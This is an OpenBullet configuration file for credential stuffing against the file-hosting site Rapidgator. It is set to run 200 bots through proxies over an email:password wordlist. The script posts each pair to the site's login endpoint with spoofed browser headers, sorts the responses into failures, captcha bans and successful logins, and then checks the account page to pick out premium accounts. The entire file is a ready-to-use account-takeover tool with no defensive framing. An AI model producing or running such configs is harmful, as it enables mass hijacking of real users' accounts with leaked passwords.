[SETTINGS]
{
  "Name": "Rapidgator",
  "SuggestedBots": 200,
  "LastModified": "2019-04-24T00:15:11.5004064+00:00",
  "AdditionalInfo": "Works faster with good proxies.",
  "Author": "Modus",
  "Version": "1.0.2",
  "IgnoreResponseErrors": false,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://rapidgator.net/auth/login" 
  CONTENT "LoginForm%5Bemail%5D=<USER>&LoginForm%5Bpassword%5D=<PASS>&LoginForm%5BtwoStepAuthCode%5D=&LoginForm%5BrememberMe%5D=0&LoginForm%5BrememberMe%5D=1&g-recaptcha-response=" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3" 
  HEADER "Referer: https://rapidgator.net/auth/login" 
  HEADER "Cache-Control: max-age=0" 
  HEADER "Origin: https://rapidgator.net" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Wrong e-mail or password." 
    KEY "ACCOUNT LOCKED" 
  KEYCHAIN Ban OR 
    KEY "captcha solved incorrectly" 
  KEYCHAIN Success OR 
    KEY "\"/auth/logout\">" 

REQUEST GET "https://rapidgator.net/profile/index" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "Premium " 
  KEYCHAIN Custom "FREE" OR 
    KEY ">Upgrade to premium<" 

